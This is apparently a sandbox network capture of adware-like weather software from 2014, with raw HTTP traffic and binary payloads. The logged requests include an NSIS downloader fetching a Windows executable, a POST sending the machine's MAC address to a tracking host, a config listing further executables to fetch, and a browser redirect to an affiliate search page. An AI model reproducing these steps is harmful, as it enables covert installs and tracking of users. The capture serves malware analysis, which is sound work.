.6........@.$#...&..@.@....................A.1.;..v.....w-.s`....@......X.cR.bb ......?R4.m......$..v.....H...@.......7Ab.@/. 4...D.&`..'Y.C.|..5.".n.A.....KX.g'......KF$.3R.(c.K..&...6zZ.@W.@.XE......!]|vGJ%.......F`........gtO .j..!|....L.{..J...B.AN....,:...9r......,..Tx...z....N...Q.......0..........yr.>.......5.r.a.....]..>./..W2@.)...=..F-.k..g.hb....6........... .z0@.:.*.@y./@.!7x`...E......P
<<
<<< skipped >>>
GET /15909623.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://tongji.uujzy.com/tongji.html?5.0.0.5002_id61_md1_os1
User-Agent: session
Host: img.users.51.la
HTTP/1.1 302 Object moved
Date: Tue, 13 May 2014 04:50:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: hXXp://vipimg.51.la:82/go.asp?svid=1&id=15909623&style=9&vpage=http://tongji.uujzy.com/tongji.html?5.0.0.5002_id61_md1_os1&46204.88.gif
Content-Length: 300
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>.<body><h1>Object Moved</h1>This object may be found <a HREF="hXXp://vipimg.51.la:82/go.asp?svid=1&id=15909623&style=9&vpage=http://tongji.uujzy.com/tongji.html?5.0%2E0.5002_id61_md1_os1&46204.88.gif">here</a>.</body>.HTTP/1.1 302 Object moved..Date: Tue, 13 May 2014 04:50:04 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Location: http://vipimg.51.la:82/go.asp?svid=1&id=15909623&style=9&vpage=http://tongji.uujzy.com/tongji.html?5.0.0.5002_id61_md1%5Fos1&46204.88.gif..Content-Length: 300..Content-Type: text/html..Cache-control: private..<head><title>Object moved</title></head>.<body><h1>Object Moved</h1>This object may be found <a HREF="hXXp://vipimg.51.la:82/go.asp?svid=1&id=15909623&style=9&vpage=http://tongji.uujzy.com/tongji.html?5.0.0.5002_id61_md1_os1&46204.88.gif">here</a>.</body>...
GET /imgn/123ie/search_arrow.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p7.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: image/gif
Content-Length: 447
Last-Modified: Wed, 25 Jul 2012 09:14:49 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:25 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a................$..................O...........FC...............QRR...{......{z.......m..li......fff......B...... %.<3.......l2.o.el......8.nWz{{58=.J....#r.T.....'....r|......Z.x4....&&'S.z..............3......YQ.............El..d,...4?......e...W...e.R}.....v....-......... *.f...vQ...9.h..............b....s..r.....M.{dY.x.....F.IJw..j....l...)p]_..6.R...Xeqy2AvcY."y....i.....f..........!.....~.,............~..............x.....x......;HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:25 GMT..Content-Type: image/gif..Content-Length: 447..Last-Modified: Wed, 25 Jul 2012 09:14:49 GMT..Connection: keep-alive..Expires: Thu, 12 Jun 2014 04:49:25 GMT..Cache-Control: max-age=2592000..Accept-Ranges: bytes..GIF89a................$..................O...........FC...............QRR...{......{z.......m..li......fff......B...... %.<3.......l2.o.el......8.nWz{{58=.J....#r.T.....'....r|......Z.x4....&&'S.z..............3......YQ.............El..d,...4?......e...W...e.R}.....v....-......... *.f...vQ...9.h..............b....s..r.....M.{dY.x.....F.IJw..j....l...)p]_..6.R...Xeqy2AvcY."y....i.....f..........!.....~.,............~..............x.....x......;t>....
GET /imgu/2014/05/20140513112717_7.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p7.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/jpeg
Content-Length: 11976
Last-Modified: Tue, 13 May 2014 03:27:17 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
......Exif..II*.................Ducky.......d.....mhXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:1D83D2A5C09EE3119F67BC560D35722B" xmpMM:DocumentID="xmp.did:94D6195DD97C11E3BF6BA573D74A4472" xmpMM:InstanceID="xmp.iid:94D6195CD97C11E3BF6BA573D74A4472" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:02B321837BD9E311B9DCEA1BD6C26215" stRef:documentID="xmp.did:1D83D2A5C09EE3119F67BC560D35722B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................................k._................................................................................................!..1..AQ"..aq.2#...B$....3..Rr.Cc.&.........................!..1A.Qaq"...2....B...r#...b.34.RCs$5.6............?..S.........8z*.S./...].v.s/......5.t...6.......q[z5.....SXF4.H...0S......c....7.E...;F.I)...E..<.T.~-...c.q>.m...3.-.KL....d.H&R*...{..a.......W.n.....7.b...r6.d...i......7....xe.fp.
<<
<<< skipped >>>
GET /cnzz/weather/weatherPng/cnzz.html HTTP/1.1
User-Agent: mfc5002
Host: weather51la.cnzz.uujzy.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:56 GMT
Content-Type: text/html
Content-Length: 2
Last-Modified: Wed, 18 Dec 2013 02:33:49 GMT
Connection: keep-alive
ETag: "52b1098d-2"
Accept-Ranges: bytes
OKHTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:56 GMT..Content-Type: text/html..Content-Length: 2..Last-Modified: Wed, 18 Dec 2013 02:33:49 GMT..Connection: keep-alive..ETag: "52b1098d-2"..Accept-Ranges: bytes..OK..
GET /favicon.ico HTTP/1.1
User-Agent: ...............
Host: lvdou.300duo.com
Connection: Keep-Alive
HTTP/1.1 302 Object moved
Date: Tue, 13 May 2014 04:49:23 GMT
Server: Microsoft-IIS/6.0
Location: hXXp://123.sogou.com/?22014
Content-Length: 148
Content-Type: text/html
Set-Cookie: daohang=0; path=/
Set-Cookie: ASPSESSIONIDAAQBQDRT=JPBGIBHAFGFCCDGADMHIOFKD; path=/
Cache-control: private
<head><title>Object moved</title></head>.<body><h1>Object Moved</h1>This object may be found <a HREF="hXXp://123.sogou.com/?22014">here</a>.</body>.HTTP/1.1 302 Object moved..Date: Tue, 13 May 2014 04:49:23 GMT..Server: Microsoft-IIS/6.0..Location: hXXp://123.sogou.com/?22014..Content-Length: 148..Content-Type: text/html..Set-Cookie: daohang=0; path=/..Set-Cookie: ASPSESSIONIDAAQBQDRT=JPBGIBHAFGFCCDGADMHIOFKD; path=/..Cache-control: private..<head><title>Object moved</title></head>.<body><h1>Object Moved</h1>This object may be found <a HREF="hXXp://123.sogou.com/?22014">here</a>.</body>...
GET /imgn/v32/selogo_111207.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p1.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/png
Content-Length: 12155
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...a...?.....V.......pHYs................OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<< ".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I. .6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9., .......3...!.[..b@q..S.(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._... .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).)..4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC].@C.a.a......<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<
<<< skipped >>>
GET /imgn/sehome/tjv1/subnav_v41.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p0.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/png
Content-Length: 3655
Last-Modified: Mon, 28 Jan 2013 13:46:09 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...............x.....sBIT.....O.....PLTE"5R..L4s...$.?....fff............iV*.ji......t.........hC...)Bd.....k...........f......9..............Q`w..Y[ZZ.......YRGGG;`......k.4/..B..E...J..f..........`.....}...-D.....zq...f......rP..T........N....eW...i|...r..`..LGt...dR....<..................O....T..........MI.../Kr.J-...........t..e.....}}.....333..I......wvw`..I}........iC......4U.....( .................3.....W.....:.."w....S........n..x.....B.....\..sAj...r..b........d...........}b...........IYq...9X......Jr......m9.....Q.........].......a..:.yR..G......Lz.k..........~..f........IEq...Qp........... Fj................................m..Ko....^9].........z........jW........T....S7Qs.....[..W..C..J....................................b..Cm.R}............J..')Jk{.......:..cl..=d......k..;..H.....jLt.B..f....tRNS................................................................................................................................................................................................................................................................s.......pHYs...........~.....tEXtSoftware.Adobe FireworksO..N....tEXtXML:com.adobe.xmp.<?xpacket begin=" " id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com
<<
<<< skipped >>>
GET /imgn/v32/titlebg.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p0.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:24 GMT
Content-Type: image/png
Content-Length: 2842
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:24 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR.............b.......pHYs................OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<< ".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I. .6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9., .......3...!.[..b@q..S.(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._... .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).)..4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC].@C.a.a......<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<
<<< skipped >>>
GET /u/js/ufo2.js HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p0.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 06 Nov 2012 08:12:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Tue, 20 May 2014 04:49:25 GMT
Cache-Control: max-age=604800
Content-Encoding: gzip
600a...............v.G....<.....X.D.={...m.....MK.v7I{.R.A.......<.y..d.......!.g.Y..ZDU.=#.......]..M.|.....o.O..^..=\\.m..b9y4......{...j.o...t1o..A.6>..G...}._....O.g....e..Y....e.x...W.....j...M.[....Yw..]..../{...b......n.;x..../F..w.%.G.Y.m....a.`.^.....l~S4.?:j......7..Y.U6[..n.=).......f]6..1..io1...../.I.u.^...u.mc..).....{..g =....f6k..o.`t.hPa.;.u.n....9j..............3.......u{w....4.J.....]X.Q...NK{<^,....|..f...Q.4.<.nOW_]]...0.(..f.dp.j.....t~S....f..h.e.h.(..&.....y... {..g.....f.........f.?.6.(.s.@5Z..........l...g.G..[....*.@u...cm...y.....@r..P>N.............l.wE?u%....l....Y...>u.W.~.9.T0..G..........g.;(..js.Og..8a......V.W..`;.......?_.........a.q.....*..Y8..M.U.9h.e._._..7W@..e....B6e..~5 ..u..<h...d}....4....u..Jp:.v...0...xhx..........9h.<>.........P5.!-...e..v..WM.K.Eg(....0.n..W_.QN.v...}.e1f.....*&.aP.[.yw.._.. ..3...r].Mhr>...$|.6.....SN.G..E.=.y..;.=).G...[0.Zm.G#.`X..........y...?.O.v..4o..M.... ..MGc..>B...fV......<....~o_..IY/.........]....C.0....2..aN........w....w..n.n....u.|}5....b^..L....?x.>...h#.lY...&..V.c#...o. ..k?....vK#.....l....^.`..0..t./..u.vS.H}.e....&v....m....02\.b?v.".......... .W.0......=z..p9...0..k..~....Z...\.W...N.i....."?5.3..p.....m....t^....e....V'5c...|..|6.nb..W?9....,[;.\....K......F..8`...~.p...cq"....N..=.C.<j....x.S<.....C."^..g.C;w.}D,......Q..`....V|h..._.w..N....0.%..?.S....|.R}..........1......t<~29...A.N.g.....Z......H.....Ec1.....^s_..<....[.7{...!.....u2.... ...b8.A1.B8-...]._7.Z5.0.....
<<
<<< skipped >>>
GET /update/365/365weatherIns_61.rar HTTP/1.0
Host: lm.beilequ.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Tue, 13 May 2014 04:39:38 GMT
Content-Type: application/x-rar-compressed
Content-Length: 1038034
Last-Modified: Fri, 21 Mar 2014 05:24:42 GMT
Connection: close
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1H..u)..u)..u)...&..w)..u)...)...&..d)...6...).../..t)..Richu)..........PE..L.....:J.................\...........2.......p....@..........................`...............................................s.......p...............................................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data...x............r..............@....ndata...0...@...........................rsrc........p.......v..............@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..X...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e..9}...Dp@........FP.VT........ M............U....M....3...3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...e....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F..
<<
<<< skipped >>>
GET /cnzz/weather/5.0.0.5002/weatherdata/_61/cnzz.html HTTP/1.1
User-Agent: mfc5002
Host: weather51la.cnzz.uujzy.com
Cache-Control: no-cache
Cookie: city=101010100
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:50:02 GMT
Content-Type: text/html
Content-Length: 198
Last-Modified: Wed, 16 Apr 2014 09:44:13 GMT
Connection: keep-alive
ETag: "534e50ed-c6"
Accept-Ranges: bytes
a556f5dd20dcbdfb274d34f5c504a160$2d204d39f2faa25896874c01c0135d760$bca7b8d364fc9c89c96702a19aa47a00$d8099717b5894a1c926de4f6fe36e650$bf60bbabd09f5e0270f38adbc02d36b0$b982497d26da6f0218296012b54c5ab0HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:50:02 GMT..Content-Type: text/html..Content-Length: 198..Last-Modified: Wed, 16 Apr 2014 09:44:13 GMT..Connection: keep-alive..ETag: "534e50ed-c6"..Accept-Ranges: bytes..a556f5dd20dcbdfb274d34f5c504a160$2d204d39f2faa25896874c01c0135d760$bca7b8d364fc9c89c96702a19aa47a00$d8099717b5894a1c926de4f6fe36e650$bf60bbabd09f5e0270f38adbc02d36b0$b982497d26da6f0218296012b54c5ab0....
GET /cnzz/weather/5.0.0.5002/weatherdata/_61/WeatherContext.xml HTTP/1.1
User-Agent: mfc5002
Host: weather51la.cnzz.uujzy.com
Cache-Control: no-cache
Cookie: city=101010100
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:50:04 GMT
Content-Type: text/xml
Content-Length: 509
Last-Modified: Fri, 21 Mar 2014 04:22:34 GMT
Connection: keep-alive
ETag: "532bbe8a-1fd"
Accept-Ranges: bytes
<html>..<title>........</title> ..<body scroll=no>..<skin>..<name>skin.xml</name>..<path>http://conf.f.360.cn/status.html</path>..<hash>ffa9975d557f9225ae0a0eb80212b98f</hash>..<size>0</size>..<type>0</type>..<cnzz>hXXp://int.dpool.sina.com.cn/iplookup$cnzz_ID_0</cnzz>..<cfg>hXXp://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/</cfg>..<cfg>hXXp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/</cfg>..<tqy>AQI.5002.exe</tqy>..<chx>worldWeatherRealTime5002.exe</chx>..</skin>..</body>..</html>HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:50:04 GMT..Content-Type: text/xml..Content-Length: 509..Last-Modified: Fri, 21 Mar 2014 04:22:34 GMT..Connection: keep-alive..ETag: "532bbe8a-1fd"..Accept-Ranges: bytes..<html>..<title>........</title> ..<body scroll=no>..<skin>..<name>skin.xml</name>..<path>http://conf.f.360.cn/status.html</path>..<hash>ffa9975d557f9225ae0a0eb80212b98f</hash>..<size>0</size>..<type>0</type>..<cnzz>hXXp://int.dpool.sina.com.cn/iplookup$cnzz_ID_0</cnzz>..<cfg>hXXp://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/</cfg>..<cfg>hXXp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/</cfg>..<tqy>AQI.5002.exe</tqy>..<chx>worldWeatherRealTime5002.exe</chx>.
<<
<<< skipped >>>
GET /imgu/2013/08/20130820165531_481.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p6.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:24 GMT
Content-Type: image/gif
Content-Length: 2049
Last-Modified: Tue, 20 Aug 2013 08:55:31 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:24 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a..y....1.....A.....c........t..S........9........I........Y..j...........<..L.....y.................X...........T..s.....J..J..a..c....................................................................!.....*.,......y....@.pH,....r.l:...tJ.*.X.*......6.]...3Z.^.........^..m........M\fDyH.[G.t.D.t.D........D..Y.X..D..........C..............c_x.......K..J. C.J....*..H......I.Y...I....J....".....G..X..H.....@.......".`O..e.28A....%..a..B... C...a...I.....$..EF\h@....E.. 2........h0d...H."e9AH....X.....1.....5...U.....lY,....I....B..@bA...x....$.......'.....@ 8".Wc.]..U. ...."\.PYX...@.8..C....aY.....q..;....8..A.;...............@..%....................s.....@..x..>.p..C,..H@..@......".]...u.B...0.....S...A.].."A......X(.............z\80Ak...@...@....p....g..#)..v.p... .$@..-.M.....E.,.@rBd....ET...\D..X.Q......9Ch..\B..@.ExW...`..5.`..[CH..5Hx."...@X..,..nF .H0W0....F...*P..I.@P.5..9...Q...&%.....0.wX.p....!......{XL"`..0P.v.bq....`A..0.......}h9....(@..]9......M\.T.... ...........W......:P.p.d?.DG.B..OA.<. .....U&..U.x.y...c..F......E..eT..g..@......q...z....A..X...C.gQ..Bh....(...@.....,...(4...Ll....`.4.....5.p...D.pY.>.,F...q.......K..A.X.)....-.......B.Pc....x .0p.`.0...^....C|l.........V..........!.".*3.BT........oX B&.q...s.$`....@...b.mP.......L]..m^@......!..A..k.6.b.yD..d.....o.Gc.$L.y..Bj^...S..O.S...............R?.E.Fz... .9....&.P.9@......j...w%...m]............ ..@...........&$...`*..n.C....?....0..0 b.b..Dh..0....L.aH.*R..(.........>F.M.p(.S...g<.....5.!Bi,...t.9.....c..p..de..
<<
<<< skipped >>>
GET /jsn/v33_sugg_ajaj_v40_3.js HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; GOTO=Af22014
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: application/x-javascript
Last-Modified: Fri, 02 Aug 2013 03:01:34 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
12ba.............Z{w.........5{<."..;..Y.q...W<..;.\6.A.d..........VK.;...............5J.a..~-..Az...*..W.HM....j.....XJ0xt..R_. k.es...c.l..Y.Dz.;.......m...HUn..gJ}..k...,...z.:.3...J&n.-,6^.s..5...vS...`...Oc..Bw..z...T.Rz..4qm.~.N.T4...8.?`...........N.I......6....}...F.......9....v....;q....h...A4c....V...F.....k&j..a...91#.n....x...s.....N..`.h$M......}....?...?...=Yl..8K...................k.ZhA.o...ol.}...p....~n9I.. ..$.......L...w.......g....H...|f...4ADSy.(.......=^..v....v.'......u...gC..'*..*....#....Z......o..*.#'I#.v.....s.\>..6......5[c.|Vb.....l.l..k7N...._..D.....4.$l8.d...J..........m.....%.Z.F..-...>.3...k....a.D....U... 3U...]...w........c2...(..a...VO.$I.........s}...M9N.q.=.....9.0..._...,.|.He....r...........>g^....u.%....7.....DU..*..J....R'i.h%Q@.<.........%.7..%pVbO....V1'!!^..}...caj.b\......Qv....(.i.S.."..|...a..1..........X.....l.,9n....x0..6Tg........S.8.36&K..hhA....U.T.J....-.'.J..i..)...l.5.v.ih..w..l...fS.y..5...7o....i...P ..V......x.M..Z4.:h.@.-g..S..h.8.ss.C1i....4Z.Q...<..|.{X.o`!_..K.P.....a....>./...*/.|......m.X.W.!.....$...r(..4.....0|..|.* LzF.3->..k..:.X...\.].........Q..{._....'........Q9M.........q...........K.....GH..I..c.U....e>.../.'=N...-......W..^Y.p.!..>]..:.NU..GM..^o.9N.%.(GAD.v.&I...!.s.q2..F..q...."h....%...o.".M......H)..,...(..,z@.uI|...{..*....`x.....:...A..S......r.?}....!.`.0..&..!..#.#";.#....e3.0gG.J.=#..a.......Oz.|.q`..D.L... .z.....#..=6t.RTla)...[Gz'B3..:...b.SZ.}#W9.W...Vi....U>.)W.g....dZ(.. ....S.j>...#
<<
<<< skipped >>>
POST /post/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.xzsky.com
Content-Length: 137
Connection: Keep-Alive
Cache-Control: no-cache
mac=00-0C-29-8A-8B-37&soft_id=33&tuiguang_id=C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\365weatherIns_61.exe&yanzheng=318d97cc71dd4de571edddf8241ae5c0
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.15
0..HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:38 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: PHP/5.3.15..0..
GET /pv.gif?uigs_productid=ufo&ufoid=ads&ptype=ads&pcode=ads&rdk=1399956570087&img=extra.gif&yyid=&ssuv=&m=&loc=&module=show&tag=172 HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pb.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:28 GMT
Content-Type: text/xml
Content-Length: 0
Connection: keep-alive
Set-Cookie: SUV=00DD04B9C18AF4E75371A458B1D10495; expires=Fri, 10-May-24 04:49:28 GMT; domain=.sogou.com; path=/
